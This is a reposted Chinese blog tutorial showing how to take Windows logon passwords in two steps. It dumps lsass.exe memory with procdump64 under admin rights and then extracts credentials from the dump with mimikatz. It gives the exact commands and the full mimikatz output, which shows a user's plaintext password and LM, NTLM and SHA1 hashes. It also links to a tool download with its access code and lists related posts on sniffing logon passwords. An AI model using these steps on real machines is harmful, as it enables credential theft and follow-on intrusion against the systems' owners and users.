2. 程式人生 > 其它 >兩步完成利用procdump64+mimikatz獲取win使用者密碼

兩步完成利用procdump64+mimikatz獲取win使用者密碼

阿新 發佈:2021-06-25

使用procdump64+mimikatz可實現從記憶體中獲取明文密碼

工具

1 連結:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw密碼:fc38

首先得先獲取到記憶體檔案lsass.exe程序,它用於本地安全和登陸策略,一般在程序管理器中能看到, 比如這樣

1.匯出lsass.exe

1 procdump64.exe -accepteula -ma lsass.exe lsass.dmp

(注:必須使用管理員許可權)

1 2 3 4 5 6 7 8 9 ProcDump v8.0 - Writes process dump files
Copyright (C) 2009-2016 Mark Russinovich Sysinternals - www.sysinternals.com With contributions from Andrew Richards [15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp [15:33:28] Dump 1 writing: Estimated dumpfilesize is 34 MB. [15:33:28] Dump 1 complete: 34 MB writtenin1.4 seconds
[15:33:28] Dump count reached.

2.執行mimikatz

1 mimikatz.exe"sekurlsa::minidump lsass.dmp""sekurlsa::logonPasswords full"exit

(注:必須使用管理員許可權)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 ECHO 處於開啟狀態。 .#####. mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil! .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##'Vincent LE TOUX ( [email protected] ) '#####'> http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline)# sekurlsa::minidump lsass.dmp Switch to MINIDUMP :'lsass.dmp' mimikatz(commandline)# sekurlsa::logonPasswords full Opening :'lsass.dmp'fileforminidump... Authentication Id : 0 ; 137859 (00000000:00021a83) Session : Interactive from 1 User Name : chenglee Domain : chenglee-PC Logon Server : CHENGLEE-PC Logon Time : 2018/7/2515:06:35 SID : S-1-5-21-452281122-3045282507-3243563612-1000 msv : [00000003] Primary * Username : chenglee * Domain : chenglee-PC * LM : 9cffd5e7eefa14babacbf0b4adf55fde * NTLM : 8d0f8e1a18236379538411a9056799f5 * SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20 tspkg : * Username : chenglee * Domain : chenglee-PC * Password : lizhenghua wdigest : * Username : chenglee * Domain : chenglee-PC * Password : lizhenghua kerberos : * Username : chenglee * Domain : chenglee-PC * Password : lizhenghua ssp : credman : Authentication Id : 0 ; 137821 (00000000:00021a5d) Session : Interactive from 1 User Name : chenglee Domain : chenglee-PC Logon Server : CHENGLEE-PC Logon Time : 2018/7/2515:06:35 SID : S-1-5-21-452281122-3045282507-3243563612-1000 msv : [00000003] Primary * Username : chenglee * Domain : chenglee-PC * LM : 9cffd5e7eefa14babacbf0b4adf55fde * NTLM : 8d0f8e1a18236379538411a9056799f5 * SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20 tspkg : * Username : chenglee * Domain : chenglee-PC * Password : lizhenghua wdigest : * Username : chenglee * Domain : chenglee-PC * Password : lizhenghua kerberos : * Username : chenglee * Domain : chenglee-PC * Password : lizhenghua ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2018/7/2515:06:15 SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : CHENGLEE-PC$ Domain : WORKGROUP Logon Server : (null) Logon Time : 2018/7/2515:06:15 SID : S-1-5-20 msv : tspkg : wdigest : * Username : CHENGLEE-PC$ * Domain : WORKGROUP * Password : (null) kerberos : * Username : chenglee-pc$ * Domain : WORKGROUP * Password : (null) ssp : credman : Authentication Id : 0 ; 48630 (00000000:0000bdf6) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2018/7/2515:06:06 SID : msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : CHENGLEE-PC$ Domain : WORKGROUP Logon Server : (null) Logon Time : 2018/7/2515:06:05 SID : S-1-5-18 msv : tspkg : wdigest : * Username : CHENGLEE-PC$ * Domain : WORKGROUP * Password : (null) kerberos : * Username : chenglee-pc$ * Domain : WORKGROUP * Password : (null) ssp : credman : mimikatz(commandline)# exit Bye!

看, 密碼[lizhenghua]處於明文暴露狀態.

如果不是使用管理員模式執行cmd會報錯,

posted @2018-07-25 15:58夏天公子 閱讀(17902) 評論(2)編輯收藏舉報

相關推薦

完成利用procdump64+mimikatz獲取win使用者密碼

使用procdump64+mimikatz可實現從記憶體中獲取明文密碼 工具 1 連結:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw密碼:fc38

利用系統函式獲取Windows明文密碼

0x01 前言 前段時間,根據大佬Grzegorz Tworek釋出的 :使用LanMan版本的NPLogonNotify()函式來嗅探用於登入Windows的每個密碼。明文。無需重新啟動。今天過來研究一波,同時借鑑 來自鴻鵠 ly大佬寫的整合powersh

Spring Boot實戰(一):只需!Eclipse+Maven快速構建第一個Spring Boot專案

隨著使用Spring進行開發的個人和企業越來越多,Spring從一個單一簡潔的框架變成了一個大而全的開源軟體,最直觀的變化就是Spring需要引入的配置也越來越多。配置繁瑣,容易出錯,讓人無比頭疼,簡化Spring配置簡直可

Oracle 個逗號分割的字串,獲取交集、差集(sql實現過程解析)

Oracle資料庫的個欄位值為逗號分割的字串,例如:欄位A值為“1,2,3,5”,欄位B為“2”。

Python利用PyPDF2庫獲取PDF檔案總頁碼例項

Python中可以利用PyPDF2庫來獲取該pdf檔案的總頁碼,可以根據下面的方法一步步進行下去:

微信小程式之導航滑塊檢視容器功能的實現程式碼(簡單)

先看效果圖: 這個滑塊除了可以點選上方的導航,還可以左右切換頁面,隨之導航也跟這切換。

c#中利用Tu Share獲取股票交易資訊

一、什麼是Tu Share Tushare是一個免費、開源的python財經資料介面包。主要實現對股票等金融資料從資料採集、清洗加工到資料儲存的過程,使用者可以免費(部分資料的下載有積分限制)的通過它提供的財經介面獲取股票

Kubernetes 驗證 - 使用 Serverless 實現動態准入控制

作者:CODING - 王煒 1. 背景 如果對 Kubernetes 叢集安全特別關注,那麼我們可能想要實現這些需求:

古有七成詩,今有六完成DevOps上華為雲DevCloud實踐

引言: 在“DevOps能力之屋(Capabilities House of DevOps)”中,華為雲DevCloud提出(工程方法+最佳實踐+生態)×工具平臺=DevOps能力。華為雲DevCloud將推出“DevOps on DevCloud”系列

Linux系統CentOS7版yum安裝mongoBD(3完成)

1.配置MongoDB的yum源 vim /etc/yum.repos.d/mongodb-org-4.0.repo [ngodb-org] name=MongoDB Repository baseurl=http://mirrors.aliyun.com/mongodb/yum/redhat/7Server/mongodb-org/4.0/x86_64/

java獲取登入IP和登入時間的種實現程式碼詳解

第一種直接用java自帶的InetAddress類: import java.net.InetAddress; import java.text.SimpleDateFormat;

Android狀態列白底黑字,只需輕鬆搞定

1,配置: /Users/z/code/zeropay/app/src/main/res/values/styles.xml : 紅色標籤意義是Activity中的佈局不進入狀態列

(全)JAVA時間計算工具類/得到個日期間的天數/獲取不帶時分秒的日期/得到Util型別的Date/獲得個日期間的月數/根據日期獲取當天是周幾

import java.sql.Time; import java.text.ParseException; import java.text.SimpleDateFormat; import java.util.Calendar;

Python開發的第一利用Python開發一個桌面小程式

前言 當使用桌面應用程式的時候,有沒有那麼一瞬間,想學習一下桌面應用程式開發?建議此次課程大家稍作了解不要浪費太多時間,因為沒有哪家公司會招聘以為Python程式設計師開發桌面程式吧?

位元組跳動2020年九月筆試題-爬樓梯(不能連續爬

位元組跳動2020年九月筆試題-爬樓梯 我的CSDN-----------------------https://blog.csdn.net/qq_42093046/article/details/108434510

python利用platform模組獲取系統資訊

Python platform 模組 platform 模組用於檢視當前作業系統的資訊,來採集系統版本位數計算機型別名稱核心等一系列資訊。

並作——帶你初識雙拼輸入法

你都嘗試過什麼方法打字?26 鍵太小容易按錯?9 鍵需要多一次確認,單字難打?五筆需要熟記字根,而且詞庫太少?

簡單教會:Mac系統如何檢視系統日誌

系統出現問題的時候,我們應該怎麼做?檢視系統日誌嗎?那麼你會在Mac上檢視系統日誌嗎?其實Mac會保留系統日誌,這可以幫助你診斷和排除macOS和已安裝的應用程式的問題。這些日誌以純文字日誌檔案的形式儲

簡單實現鐵威馬NAS外網訪問

想要讓NAS使用起來更加的方便,只有區域網共享是遠遠不夠的,內外網同步是必須的。當然,這還需要其它硬體的支援,一個是NAS自身的域名轉發功能,但經過試驗,遠端管理還是靠譜的,但要遠端訪問NAS中的檔案

MySQL安裝最後無響應處理

mysql安裝最後無響應1、解除安裝mysql 2、刪除安裝目錄資料夾 3、很多人都是在這一沒有做,顯示出隱藏檔案ProgramData,刪除MySQL資料夾。4、重新安裝MySQL即可。親測5.5和8.0都實用。